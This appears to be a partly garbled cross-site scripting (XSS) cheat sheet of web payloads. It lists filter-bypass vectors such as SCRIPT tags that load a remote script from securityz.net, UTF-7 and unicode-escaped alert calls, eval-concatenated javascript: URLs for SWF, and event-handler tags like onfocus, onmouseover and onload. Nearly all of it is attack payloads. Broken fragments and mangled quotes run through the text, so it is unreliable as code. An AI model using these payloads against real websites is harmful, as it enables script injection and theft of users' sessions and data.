">

">
">
">


">


Browser version


Inside .SWF XSS

a=«get»;
b=«URL(\»";
c=«javascript:»;
d=«alert('XSS');\»)";
eval(a+b+c+d);




<SCRIPT =">" SRC=«securityz.net/xss.js»>
<SCRIPT a=">" '' SRC=«securityz.net/xss.js»>
<SCRIPT «a='>'» SRC=«securityz.net/xss.js»>


PT SRC=«securityz.net/xss.js»>PT SRC=«securityz.net/xss.js»>XSSXSSXSSXSSXSSXSSXSS+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-



/srcdoc='<svg onload=alert(1)>'>


<body/onpageshow=(alert)(1)>
">/*To bypass input values*/

«autofocus/onfocus=»alert (/1)
onfocus=onfocus=\u0061lert(1) autofocus
autofocus onfocus=window.onerror=alert;throw/1/;//

xxxx'"<img src=1 onerror=alert() a
<
<mArquee%20onStart%3D[~[onmouseleave(([[(alert(1))]]))]]%20]
<script /* /*/*/*>\u0061l\u0065rt`X`</x+x
OR

OR
<script /* /*/*/*>\u0061l\u0065rt`X`<



<link rel=import href=https:securityz.net/test.swf

/*tougher policy on the html tags*/
xwx
<h1/onmouseover='\u0061lert(1)'>xwx
<marquee/onstart=alert(1)>xwx
<div/onmouseover='alert(1)'>xwx
<h1/onmouseover='alert(1)'>xwx
xwx
xwx
<p/onmouseover='alert(1)'>xwx
<plaintext/onmouseover=prompt(1)>
/*Classic very popular vector*/


<iframe/onload=alert(1)>